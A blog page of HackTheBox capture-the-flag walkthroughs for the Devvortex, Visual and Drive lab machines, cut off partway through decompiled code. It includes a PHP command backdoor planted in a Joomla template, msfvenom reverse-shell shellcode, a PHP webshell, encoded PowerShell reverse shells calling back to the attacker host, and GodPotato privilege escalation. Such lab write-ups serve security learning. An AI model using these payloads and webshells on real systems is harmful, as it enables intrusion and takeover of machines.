0xk4k45h1

Active Directory
CTF
HackTheBox
- Machines
  - Devvortex
  - Drive
  - PC
  - Visual
- Sherlock
Home

Contact

Copyright © 2024 | Yankos

Home > HackTheBox

Now Loading ...

HackTheBox

Devvortex
Description Solution Recon Applying nmap scan ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/devvortex] └─$ nmap -sV -sC -Pn -oA devvortex 10.10.11.242 Nmap scan report for 10.10.11.242 Host is up (0.22s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://devvortex.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . we see that there’s a web service on port 80 and there’s a domain devvortex.htb should be submitted in /etc/hosts file when we add the domain to /etc/hosts we can visit the site now After examining the site you won’t find any interesting thing so let’s do more reconnaisance. ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/devvortex] └─$ gobuster dir -u http://10.10.11.242/ -w ~/Desktop/tools/SecLists/Discovery/Web-Content/raft-small-directories.txt -b 302 but I got no useful results, so let’s try subdomain enumeration ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/devvortex] └─$ ffuf -u http://10.10.11.242 -H "Host: FUZZ.devvortex.htb" -w ~/Desktop/tools/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 153ms] shell as www-data We found a subdomain here which is dev.devvortex.htb. let’s add it to /etc/hosts file and visit the subdomain. After examining the site you won’t find any interesting thing also so let’s do more reconnaisance. I found interesting endpoints in /robots.txt endpoint. when you visit /administrator endpoint you will find login page powered by joomla cms. You can find tips for joomla pentesting here. you will find in the link above that /administrator/manifests/files/joomla.xml endpoint let’s you know the version of joomla. We see that the version is v4.2.6 which we can find that it’s vulnerable to CVE-2023-23752. You can find many articles about the cve here as example and from them i appended /api/index.php/v1/config/application?public=true to the url and got this Nice we got credentials lewis:P4ntherg0t1n5r3c0n## which will be used to login to joomla dashboard. continue reading in this and you will find what you should do next. You should go to system and you will find many templates i choosed Administrator Templates and find many files. I opened index.php and added this line system($_GET['cmd']); so when i visit this http://dev.devvortex.htb/administrator/index.php?cmd=whoami I see www-data which is the result of whoami command in the beginning of the site Nice we have RCE let’s get a shell. setting up a listerner at port 4444 ┌──(youssif㉿youssif)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... and i went to revshells for the reverse shell payload. You can use many php shells as the payload will be inserted in php code (I used pentest monkey php shell) added it to index.php file in the admin templates and i got the shell as www-data shell as logan stablize the shell using python3 -c "import pty;pty.spawn('/bin/bash)" If you remember the article of the CVE we used, The credentials are usually for MYSQL db and when we use the command ss -tulpn we find that port 3306 is used which is the default for MYSQL. Let’s access MYSQL db www-data@devvortex:/$ mysql -u lewis -p mysql -u lewis -p Enter password: P4ntherg0t1n5r3c0n## We accessed the db successfully and after digging into it we found sd4fg_users table in joomla database mysql> select username,password from sd4fg_users; select username,password from sd4fg_users; +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | | logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | +----------+--------------------------------------------------------------+ 2 rows in set (0.00 sec) we have two users with two hashed passwords i tried to crack them but only the password of the user logan is cracked successfully. ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/devvortex] └─$ john hash --show ?:t************ 1 password hash cracked, 0 left I used this password in ssh ssh logan@10.10.11.242 and congrats u are logan now logan@devvortex:~$ ls user.txt logan@devvortex:~$ cat user.txt 1******************************* shell as root logan@devvortex:~$ sudo -l [sudo] password for logan: Matching Defaults entries for logan on devvortex: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User logan may run the following commands on devvortex: (ALL : ALL) /usr/bin/apport-cli We find that there’s a command you can execute using sudo I found that this command is vulnerable to privesc here. Briefly you will walkthrough the choices until you get view report which will be opened in a less page as root so you can execute !/bin/bash as root and now you are root. root@devvortex:/home/logan# cd /root root@devvortex:~# cat root.txt b******************************* I wish the walkthrough helped you ^^
HackTheBox · 2024-04-27
Visual
Description Solution Recon ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/visual] └─$ nmap -sV -sC -Pn -oA nmap/visual 10.10.11.234 # Nmap 7.92 scan initiated Sat Sep 30 21:32:35 2023 as: nmap -sV -sC -Pn -oA visual 10.10.11.234 Nmap scan report for 10.10.11.234 Host is up (0.18s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17) |_http-title: Visual - Revolutionizing Visual Studio Builds |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Sep 30 21:33:23 2023 -- 1 IP address (1 host up) scanned in 48.53 seconds shell as enox When we open the site http://10.10.11.234 we get this As said the site can accept a repo of dotnet6 and it will trust the project we sent, execute it and send the DLL back as example first i wanted to test it using a random C# project repo but note that we can’t submit the url of the repo directly and this because the lan at which the HTB machine exists isn’t connected to Internet so we need to submit this repo over the lan. After searching i found this article about how to serve a repo over http. I created a simple C# project that prints hello world xDDD and uploaded this repo on github. Its path is https://github.com/YoussifSeliem/visualHTB then i cloned this repo into my machine git clone https://github.com/YoussifSeliem/visualHTB Then let’s start as in article ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/visual/tst] └─$ git --bare clone visualHTB repo-http cd repo-http/.git git --bare update-server-info mv hooks/post-update.sample hooks/post-update cd .. python -m http.server 8000 Then I submitted the repo into the site by submitting this link http://10.10.16.81:8000/.git/, then i got this Now we need to move forward in this machine and we can make use of the way the project is handled by the site as it’s got trusted and executed. After searching i found many useful articles like MSBuild & evilSLN. I used MSBuild exploit, it makes use of the fact that visual studio uses MSBuild. Briefly, we can say that MSBuild is an engine that provides an XML schema for a project file that controls how the build platform processes and builds software. In our case the .csprog file contains MSBuild XML code. I moved as in the article and created the shell code using ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/visual] └─$ msfvenom -p windows/shell/reverse_tcp lhost=10.10.16.81 lport=4444 -f csharp [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of csharp file: 1825 bytes byte[] buf = new byte[354] { 0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x8b,0x72,0x28, 0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49, 0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78, 0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x01,0xd3,0x50,0x8b,0x48,0x18, 0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1, 0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24, 0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c, 0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59, 0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26, 0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68, 0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x0a,0x10,0x51,0x68,0x02, 0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea, 0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61, 0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00, 0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83, 0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a, 0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57, 0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00, 0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68, 0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff, 0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb, 0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 }; I made the payload shell rather than meterpreter because in this machine the AntiVirus detected the meterpreter and closed the connection. Add the generated shell code to the .csproj file as shown in the article and this is our modified repo we will submit it again to the site. don’t forget to set up a listener in msfconsole use exploit/multi/handler msf exploit(multi/handler) > set payload windows/shell/reverse_tcp msf exploit(multi/handler) > set lhost 10.10.16.81 msf exploit(multi/handler) > set lport 4444 msf exploit(multi/handler) > exploit Then you will get the connection C:\Windows\Temp\591812c6a390d3b1c93cef7b9d4df5\ConsoleApp1>whoami whoami visual\enox I found on the system there is only enox user then i went to its Desktop to get the user flag C:\Users\enox\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 82EF-5600 Directory of C:\Users\enox\Desktop 06/10/2023 12:10 PM <DIR> . 06/10/2023 12:10 PM <DIR> .. 02/23/2024 03:07 AM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 9,479,344,128 bytes free C:\Users\enox\Desktop>type user.txt type user.txt 7****************************** shell as local service After navigation in the machine we can see C:\xampp\htdocs which is the root of web directory this gives us an idea of getting shell from it because the web service possess ImpersonatePrivilege permissions. These permissions can potentially be exploited for privilege escalation. To get shell as local service i created a simple webshell <?php echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>"; ?> Then i uploaded it to this path C:\xampp\htdocs\uploads and then accessed the shell from the site like this It works so Let’s get the shell as the local service. We can use rev shell generator and from it i choosed powershell#3 (base64), then i set up the listener and send this payload in the url http://10.10.11.234/uploads/shell.php?cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== and we got the shell connect to [10.10.16.81] from (UNKNOWN) [10.10.11.234] 49960 whoami nt authority\local service PS C:\xampp\htdocs\uploads> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled shell as root As we see SeImpersonatePrivilege doesn’t exist and this moves us to use FullPower that helps in recovering the privilages. After Downloading the tool and sending it to the victim machine we can use it to get a shell as the local service but with full privilages like this PS C:\xampp\htdocs\uploads> .\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOAAxACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" We got the shell with full privilages as shown below whoami nt authority\local service PS C:\Windows\system32> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======= SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeAuditPrivilege Generate security audits Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled Now we can exploit SeImpersonatePrivilege to get access to System user We will use potato for that. God potato is a version of it and the latest one as the previous versions were for the same purpose but are patched. Download the script and send it to victim as before, then we can use it to execute commands as system. We can get a reverse shell as System or read flag directly as shown below PS C:\xampp\htdocs\uploads> .\GodPotato-NET4.exe -cmd "cmd /c whoami" [*] CombaseModule: 0x140708928421888 [*] DispatchTable: 0x140708930728048 [*] UseProtseqFunction: 0x140708930104224 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\5d3b54b0-a045-4fd9-b2cc-24a3eec17d49\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 0000a402-1398-ffff-b3ec-b92af9a77b95 [*] DCOM obj OXID: 0x995333262ce97ff6 [*] DCOM obj OID: 0xc0dd9e4d9e40b97c [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 868 Token:0x808 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 1856 nt authority\system PS C:\xampp\htdocs\uploads> .\GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt" [*] CombaseModule: 0x140708928421888 [*] DispatchTable: 0x140708930728048 [*] UseProtseqFunction: 0x140708930104224 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\a6093430-876f-4fd6-9001-b4b9a94a7b1b\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 00004002-120c-ffff-6bc9-00a5ef395859 [*] DCOM obj OXID: 0xc5cf60320db2d932 [*] DCOM obj OID: 0xd1be762d7a08c269 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 868 Token:0x808 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 956 3******************************b
HackTheBox · 2024-02-24
Drive
Description Solution Recon Applying nmap scan ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/drive] └─$ nmap -sV -sC -Pn -oA nmap/drive 10.10.11.235 Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-20 02:36 SAST Nmap scan report for 10.10.11.235 Host is up (0.14s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 27:5a:9f:db:91:c3:16:e5:7d:a6:0d:6d:cb:6b:bd:4a (RSA) | 256 9d:07:6b:c8:47:28:0d:f2:9f:81:f2:b8:c3:a6:78:53 (ECDSA) |_ 256 1d:30:34:9f:79:73:69:bd:f6:67:f3:34:3c:1f:f9:4e (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://drive.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 3000/tcp filtered ppp Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.61 seconds shell as martin from the scan results we see that port 80 is the most interesting as 3000 is filtered we add this the record 10.10.11.235 drive.htb to /etc/hosts file and go to the site I registered in the site and then logged in with my new account I got redirected to this I see two interesting tabs upload file & dashboard upload file: enables me to upload file I tried to upload shell but i got a response indicating that a malicious behaviour detected Then i uploaded just a test file called tst with random text inside dashboard: contains the uploaded files as shown below When i open as example Welcome_To_Doodle_Grive! file, i reach this url http://drive.htb/100/getFileDetail/ and when i select other file like tst, i reach this url http://drive.htb/112/getFileDetail/ Ummmmmmm, there may be idor here but let’s check this reserve option first. It moves me to the url http://drive.htb/112/block/ Let’s try some enum for the idor ┌──(youssif㉿youssif)-[~] └─$ ffuf -u http://drive.htb/FUZZ/getFileDetail/ -w <(seq 1 2000) -fc 500 -H "Cookie: csrftoken=wltcvo5fkh1kgl0kgyrMIS64hV0sjQ1d; sessionid=teshdlvcaeur5ogjpgkr2557tjahr041" /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://drive.htb/FUZZ/getFileDetail/ :: Wordlist : FUZZ: /proc/self/fd/11 :: Header : Cookie: csrftoken=wltcvo5fkh1kgl0kgyrMIS64hV0sjQ1d; sessionid=teshdlvcaeur5ogjpgkr2557tjahr041 :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 :: Filter : Response status: 500 ________________________________________________ [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 315ms] * FUZZ: 79 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 261ms] * FUZZ: 98 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 279ms] * FUZZ: 99 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 266ms] * FUZZ: 101 [Status: 200, Size: 5081, Words: 1147, Lines: 172, Duration: 267ms] * FUZZ: 100 [Status: 200, Size: 5054, Words: 1059, Lines: 167, Duration: 276ms] * FUZZ: 112 :: Progress: [2000/2000] :: Job [1/1] :: 65 req/sec :: Duration: [0:00:26] :: Errors: 0 :: We got the interesting ids, We can access 100,112 in getFileDetail endpoint but when we try to access the others we get 401 status code in response After some trails i found that we can access them through block endpoint like this http://drive.htb/79/block/ and i found this Let’s login using these credentials ssh martin@10.10.11.235 and congratzzz we got a shell as martin shell as tom I started digging into the machine as martin by searching for simple privesc ways like sudo -l, crontab, etc but with no useful information. After some digging into the machine i found the accessable path with useful information in /var/www/backups martin@drive:/var/www/backups$ ls 1_Dec_db_backup.sqlite3.7z 1_Nov_db_backup.sqlite3.7z 1_Oct_db_backup.sqlite3.7z 1_Sep_db_backup.sqlite3.7z db.sqlite3 The 7z files needs password to be accessed but there’s db.sqlite3 can be accessed by sqlite3 db.sqlite after digging in it i reached this sqlite> select username,password from accounts_customuser; jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f tomHands|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004 crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3 after cracking them offline using hashcat i got this creds tomHands:sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004:john316 Couldn’t use it to get shell as another user but let’s keep it now When we dig into network especially using netstat -nltp we will find this martin@drive:/var/www/backups$ netstat -nltp (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - We will use port forwarding to be able to access it using the command ssh -L 3001:127.0.0.1:3000 martin@10.10.11.235 and when we access this url 127.0.0.1:3000 we reach gitea I tried this creds tomHands:john316 but couldn’t login successfully then note that from the database there’s username martinCruz who is martin and we already know his password, so i used this creds and logged in successfully to this repo after examining the repo especially the commits i found interesting commit with message added the new database backup feature This commit shows info about making the backups and we got the password to extract the archived backups when i extract the backup in backups directory i get error as i have no permissions here, so i move the backups to /dev/shm which is a traditional shared memory and extracted them their using for example this command 7z e -p'H@ckThisP@ssW0rDIfY0uC@n:)' /dev/shm/1_Sep_db_backup.sqlite3.7z -o/dev/shm/Sep.db.sqlite3 the backups are sqlite3 databases and after digging into them you will find the treasures here select username,password from accounts_customuser; and this because the instances have some changes in the passwords so we will take them and crack them offline as done before. The user tomHands is the one whose password is changed between the backup instances and here are all hashes with there hash cracking output tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141:johniscool tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a:johnmayer7 tomHands:sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004:john316 tomHands:sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93:john boy from /etc/passwd we know that there’s a user called tom and we are trying to get a shell as tom so let’s try ssh using all these passwords ┌──(youssif㉿youssif)-[~/Desktop/HTBMachines/drive] └─$ crackmapexec ssh 10.10.11.235 -u tom -p passwdTom SSH 10.10.11.235 22 10.10.11.235 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9 SSH 10.10.11.235 22 10.10.11.235 [-] tom:johniscool Authentication failed. SSH 10.10.11.235 22 10.10.11.235 [+] tom:johnmayer7 so we can ssh using tom:johnmayer7 tom@drive:~$ ls doodleGrive-cli README.txt user.txt tom@drive:~$ cat user.txt ******************************** shell as root we found doodleGrive-cli which seems very interesting it requires credientials to be launched so i moved it to my machine and started analyzing it using ghidra when ghidra finishes analysis i examined the main function which is shown below after variable renaming undefined8 main(void) { int iVar1; long in_FS_OFFSET; char username [16]; char password [56]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); setenv("PATH","",1); setuid(0); setgid(0); puts( "[!]Caution this tool still in the development phase...please report any issue to the developm ent team[!]" ); puts("Enter Username:"); fgets(username,0x10,(FILE *)stdin); sanitize_string(username); printf("Enter password for "); printf(username,0x10); puts(":"); fgets(password,400,(FILE *)stdin); sanitize_string(password); iVar1 = strcmp(username,"moriarty"); if (iVar1 == 0) { iVar1 = strcmp(password,"findMeIfY0uC@nMr.Holmz!"); if (iVar1 == 0) { puts("Welcome...!"); main_menu(); goto LAB_0040231e; } } puts("Invalid username or password."); LAB_0040231e: if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } from this function we found the username:password which is moriarty:findMeIfY0uC@nMr.Holmz! There are also 2 other functions which are sanitize_string & main_menu Let’s check them sanitize_string void sanitize_string(char *param_1) { bool bVar1; size_t sVar2; long in_FS_OFFSET; int local_3c; int local_38; uint local_30; undefined8 local_29; undefined local_21; long local_20; local_20 = *(long *)(in_FS_OFFSET + 0x28); local_3c = 0; local_29 = 